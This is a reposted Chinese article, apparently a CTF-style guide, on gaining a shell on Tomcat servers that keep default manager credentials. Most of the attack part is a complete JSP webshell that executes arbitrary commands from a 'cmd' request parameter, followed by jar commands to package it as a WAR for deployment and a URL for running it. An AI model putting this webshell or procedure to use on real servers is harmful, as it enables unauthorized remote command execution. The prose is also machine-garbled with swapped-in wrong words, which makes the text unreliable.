加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

进攻Tomcat的多种姿势

发布时间:2019-02-16 16:36:55 所属栏目:业界 来源:嘶吼专业版
导读:各人好,本文我想分享一下我的履历,假如你的Tomcat应用配置的是默认登岸凭据时(Tomcat:Tomcat)怎样举办操作?当我在打CTF时,许多次我都发明方针主机上的Tomcat应用都是设置的默认登岸凭据,这有助于我们拿到主机的长途shell。因此,我感受应该记录一下所

一旦执行了上述呼吁,我们就可以直接得到一个webshell了,如下图所示:

进攻Tomcat的多种姿势

天生JSP webshell

接下来,我们就来看看怎样天生和陈设webshell来得到Tomcat应用中的执行呼吁。

起首,我们必要写一个webshell而且打包成war名目。我们可以行使下面的代码来写一个webshell:

  1. <%@ page import="java.io.*" %> 
  2. <% 
  3.    String cmd = request.getParameter("cmd"); 
  4.    String output = ""; 
  5.    if(cmd != null) { 
  6.       String s = null; 
  7.       try { 
  8.          Process p = Runtime.getRuntime().exec(cmd,null,null); 
  9.          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 
  10.          while((s = sI.readLine()) != null) { output += s+" 
  11. "; } 
  12.       }  catch(IOException e) {   e.printStackTrace();   } 
  13.    } 
  14. %> 
  15. <%=output %> 

生涯代码为index.jsp文件,然后行使下列呼吁来打包:

  1. mkdir webshell 
  2. cp index.jsp webshell/ 
  3. cd webshell 
  4. jar -cvf ../webshell.war * 

进攻Tomcat的多种姿势

执行完这条呼吁,你就能天生一个war文件,你可以将这个war文件陈设在Tomcat应用中。

如下图所示,你可以看到,我已经乐成上传并陈设了webshell.war文件,此刻我们点击这个文件来执行:

进攻Tomcat的多种姿势

在执行/webshell时,你会获得一个404错误页面,此刻再执行webshell下的index.jsp文件,如下:

http://192.168.1.106:8080/webshell/index.jsp

会见了上述URL后,你会获得一个呼吁执行的表单,此刻你就可以在这个表单上恣意执行cmd呼吁了,如图:

进攻Tomcat的多种姿势

本文到此竣事,但愿各人有所收成。

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
    站长推荐
    热点阅读

      【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

      建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的最佳浏览效果

      Copygight © 2008-2022 https://www.hunanwang.cn/ All Rights Reserved. 湖南网